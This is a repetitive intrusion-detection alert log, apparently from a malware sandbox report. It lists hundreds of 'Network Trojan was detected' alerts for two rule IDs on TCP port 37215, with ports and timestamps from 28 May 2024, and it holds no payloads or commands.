            SID:2829579
            Source Port:47120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877404
            SID:2829579
            Source Port:55102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840528
            SID:2829579
            Source Port:57730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.812732
            SID:2829579
            Source Port:36642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916781
            SID:2835222
            Source Port:51690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780574
            SID:2835222
            Source Port:35570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.616967
            SID:2835222
            Source Port:46150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925417
            SID:2835222
            Source Port:39338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058444
            SID:2835222
            Source Port:53598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.057972
            SID:2829579
            Source Port:48960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021134
            SID:2835222
            Source Port:46606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057930
            SID:2829579
            Source Port:43606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754314
            SID:2835222
            Source Port:42260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910000
            SID:2835222
            Source Port:45396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.458203
            SID:2829579
            Source Port:35496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739130
            SID:2835222
            Source Port:49524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879803
            SID:2829579
            Source Port:43136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854141
            SID:2829579
            Source Port:46164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307540
            SID:2829579
            Source Port:34538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.694308
            SID:2835222
            Source Port:39690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031388
            SID:2835222
            Source Port:38902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809018
            SID:2835222
            Source Port:43312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.281617
            SID:2829579
            Source Port:38524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771673
            SID:2829579
            Source Port:45584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.311666
            SID:2835222
            Source Port:50008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524429
            SID:2835222
            Source Port:51456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984492
            SID:2829579
            Source Port:40990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299675
            SID:2835222
            Source Port:41140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506250
            SID:2835222
            Source Port:39834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323334
            SID:2829579
            Source Port:42088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065107
            SID:2829579
            Source Port:52334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995584
            SID:2829579
            Source Port:53502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507393
            SID:2829579
            Source Port:44592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792464
            SID:2835222
            Source Port:37746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746053
            SID:2835222
            Source Port:40920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506736
            SID:2829579
            Source Port:44842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525875
            SID:2829579
            Source Port:40440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.975259
            SID:2835222
            Source Port:55110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764884
            SID:2835222
            Source Port:59068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757530
            SID:2835222
            Source Port:32902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569217
            SID:2829579
            Source Port:44604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932876
            SID:2829579
            Source Port:36670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320785
            SID:2835222
            Source Port:33408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.589899
            SID:2829579
            Source Port:59502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776149
            SID:2829579
            Source Port:54720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858314
            SID:2829579
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824603
            SID:2829579
            Source Port:45474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855477
            SID:2835222
            Source Port:56210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026420
            SID:2829579
            Source Port:37760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039369
            SID:2829579
            Source Port:49048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185873
            SID:2829579
            Source Port:41242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855028
            SID:2835222
            Source Port:38346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.147185
            SID:2829579
            Source Port:38350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999737
            SID:2835222
            Source Port:54764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696745
            SID:2829579
            Source Port:51210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.897889
            SID:2829579
            Source Port:60276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942093
            SID:2835222
            Source Port:59020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955927
            SID:2835222
            Source Port:56462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.731725
            SID:2829579
            Source Port:44582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816964
            SID:2829579
            Source Port:46554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899770
            SID:2835222
            Source Port:54956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986442
            SID:2829579
            Source Port:51270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868429
            SID:2829579
            Source Port:54266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899456
            SID:2829579
            Source Port:60542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.123677
            SID:2835222
            Source Port:49290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445246
            SID:2835222
            Source Port:36850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048711
            SID:2835222
            Source Port:43620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508339
            SID:2829579
            Source Port:35172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508250
            SID:2829579
            Source Port:56790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669836
            SID:2829579
            Source Port:51434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280959
            SID:2835222
            Source Port:36690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559792
            SID:2829579
            Source Port:39588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849633
            SID:2835222
            Source Port:60198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.886030
            SID:2835222
            Source Port:44536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459423
            SID:2829579
            Source Port:53200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.998960
            SID:2835222
            Source Port:46774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.900039
            SID:2835222
            Source Port:39978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.440633
            SID:2835222
            Source Port:58956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084459
            SID:2835222
            Source Port:51372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.511348
            SID:2835222
            Source Port:42002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861319
            SID:2835222
            Source Port:60002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.567711
            SID:2835222
            Source Port:54112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.958691
            SID:2829579
            Source Port:47652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994775
            SID:2835222
            Source Port:35660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893994
            SID:2835222
            Source Port:35452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052848
            SID:2829579
            Source Port:34450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764665
            SID:2829579
            Source Port:35740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568468
            SID:2829579
            Source Port:34756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775624
            SID:2829579
            Source Port:44038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737714
            SID:2829579
            Source Port:49976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058541
            SID:2829579
            Source Port:42804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821320
            SID:2829579
            Source Port:48662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.462350
            SID:2829579
            Source Port:38584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.685962
            SID:2829579
            Source Port:43062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828143
            SID:2835222
            Source Port:37234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.066980
            SID:2829579
            Source Port:49810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.485643
            SID:2829579
            Source Port:54398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.341975
            SID:2829579
            Source Port:56786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877706
            SID:2829579
            Source Port:50236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.052013
            SID:2835222
            Source Port:41524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.641515
            SID:2835222
            Source Port:57868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773750
            SID:2835222
            Source Port:49878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311078
            SID:2835222
            Source Port:50916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940199
            SID:2829579
            Source Port:40700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436599
            SID:2835222
            Source Port:56762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782611
            SID:2835222
            Source Port:56530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371361
            SID:2829579
            Source Port:50462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564922
            SID:2835222
            Source Port:60176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020069
            SID:2835222
            Source Port:38002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957070
            SID:2829579
            Source Port:36804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.611957
            SID:2835222
            Source Port:57606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.340077
            SID:2829579
            Source Port:40064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534103
            SID:2829579
            Source Port:34972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.385513
            SID:2829579
            Source Port:48742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899840
            SID:2835222
            Source Port:41496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.988334
            SID:2835222
            Source Port:52534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811903
            SID:2835222
            Source Port:55372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565054
            SID:2835222
            Source Port:41988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873685
            SID:2829579
            Source Port:43510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776618
            SID:2835222
            Source Port:33230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901293
            SID:2835222
            Source Port:51914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945102
            SID:2829579
            Source Port:38528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058082
            SID:2829579
            Source Port:48778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857784
            SID:2835222
            Source Port:38708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880519
            SID:2829579
            Source Port:45414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.758219
            SID:2829579
            Source Port:43162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002982
            SID:2835222
            Source Port:44570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499822
            SID:2835222
            Source Port:60042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425812
            SID:2829579
            Source Port:47860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639943
            SID:2835222
            Source Port:41564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052536
            SID:2829579
            Source Port:55576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059707
            SID:2829579
            Source Port:33312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518946
            SID:2835222
            Source Port:48646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717408
            SID:2835222
            Source Port:49286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.846980
            SID:2829579
            Source Port:33348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.879217
            SID:2829579
            Source Port:57412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.623710
            SID:2835222
            Source Port:44496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871140
            SID:2835222
            Source Port:41402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778080
            SID:2835222
            Source Port:52882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834462
            SID:2829579
            Source Port:44426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771840
            SID:2829579
            Source Port:34530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923341
            SID:2829579
            Source Port:35430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809397
            SID:2835222
            Source Port:35160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953526
            SID:2829579
            Source Port:52336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020388
            SID:2835222
            Source Port:38698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786510
            SID:2829579
            Source Port:53596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896206
            SID:2835222
            Source Port:37396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065038
            SID:2829579
            Source Port:44260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.594505
            SID:2835222
            Source Port:55244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061086
            SID:2829579
            Source Port:40016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507900
            SID:2835222
            Source Port:35230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760117
            SID:2835222
            Source Port:42102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870650
            SID:2829579
            Source Port:55814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053046
            SID:2835222
            Source Port:53096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811903
            SID:2835222
            Source Port:51562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421664
            SID:2835222
            Source Port:38844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792511
            SID:2829579
            Source Port:42432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.765351
            SID:2829579
            Source Port:57576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278014
            SID:2829579
            Source Port:43488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929017
            SID:2835222
            Source Port:52434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532402
            SID:2829579
            Source Port:57606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.656464
            SID:2829579
            Source Port:42792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.585610
            SID:2829579
            Source Port:35906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779174
            SID:2829579
            Source Port:35794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.625864
            SID:2829579
            Source Port:52454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808367
            SID:2835222
            Source Port:58060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996074
            SID:2835222
            Source Port:52336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955839
            SID:2829579
            Source Port:60464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278076
            SID:2829579
            Source Port:44966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304207
            SID:2829579
            Source Port:53086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508396
            SID:2835222
            Source Port:51486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810036
            SID:2829579
            Source Port:59870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925755
            SID:2835222
            Source Port:55602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807043
            SID:2835222
            Source Port:47258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857888
            SID:2835222
            Source Port:59968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760111
            SID:2829579
            Source Port:52760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766815
            SID:2835222
            Source Port:48704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933087
            SID:2835222
            Source Port:48476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687741
            SID:2829579
            Source Port:55250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669432
            SID:2829579
            Source Port:41928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075159
            SID:2829579
            Source Port:36260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563490
            SID:2829579
            Source Port:38448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737649
            SID:2835222
            Source Port:55292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.341900
            SID:2829579
            Source Port:40650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.316221
            SID:2829579
            Source Port:59322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388544
            SID:2829579
            Source Port:51310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057979
            SID:2835222
            Source Port:34544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735039
            SID:2829579
            Source Port:51212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773106
            SID:2829579
            Source Port:44468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775878
            SID:2829579
            Source Port:52380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045385
            SID:2835222
            Source Port:55520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063022
            SID:2829579
            Source Port:52714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327481
            SID:2835222
            Source Port:42460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058520
            SID:2829579
            Source Port:34570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059766
            SID:2835222
            Source Port:32890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832467
            SID:2835222
            Source Port:44318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.113519
            SID:2835222
            Source Port:34410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542360
            SID:2835222
            Source Port:40812
            Destination Port:37215
